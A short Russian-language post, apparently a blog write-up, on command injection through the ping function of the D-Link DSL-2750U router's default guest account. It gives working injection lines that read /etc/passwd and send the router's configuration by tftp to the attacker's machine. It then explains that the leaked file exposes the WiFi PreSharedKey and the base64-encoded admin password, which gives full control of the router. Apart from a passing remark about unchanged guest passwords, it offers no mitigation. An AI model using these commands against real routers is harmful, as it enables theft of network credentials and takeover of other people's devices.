Зачастую многие пользователи забывают про учетную запись guest/guest в роутере и пароль естественно не меняют. А это может привести к серьезным последствиям от рук инсайдера. Повышение привилегий в роутере D-Link DSL-2750U (возможно и в других моделях) происходит через обычную команду ping в которой нет никакой проверки на вводимые данные, что приводит к выполнению любых команд от привилегированого пользователя. Пример эксплуатации: Подключаемся по telnet/ssh к роутеру под учетной записью guest/guest.

# Выводим листинг директории /etc и читаем файл /etc/paasswd
ping -c 1 127.0.0.1; ls -la /etc; cat /etc/passwd
# Бэкапим конфиг роутера на свой компьютер (например 10.0.0.123) с помощью tftp
ping -c 1 127.0.0.1; tftp -p -f backup.cfg 10.0.0.123

Открываем слитый конфиг и находим открытым текстом значение PreSharedKey на WiFi или AdminPassword в формате base64. Зная пароль администратора можно делать с роутером что угодно.